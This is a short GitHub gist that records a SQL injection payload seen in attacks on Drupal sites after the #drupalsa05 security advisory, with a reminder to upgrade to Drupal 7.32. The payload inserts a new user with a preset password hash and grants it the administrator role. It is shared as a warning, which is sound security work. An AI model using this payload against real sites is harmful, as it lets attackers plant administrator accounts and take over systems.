Last active
August 29, 2015 14:07
-
-
Save scor/4d91321d316a9fd79885 to your computer and use it in GitHub Desktop.
The kind of queries people are throwing at Drupal sites after #drupalsa05. adds a user and grants administrator role.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
set @a=(SELECT MAX(uid) FROM users)+1;INSERT INTO users set uid=@a,status=1,name='n0n0x' , pass = '$S$CTo9G7Lx2jmHrpHDdKDR0R8X/q4H9PXo02REYap3z2t8UE3F0DfC';INSERT INTO users_roles set uid=@a,rid=3;;# |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
If you haven't updated yet, please do: https://www.drupal.org/drupal-7.32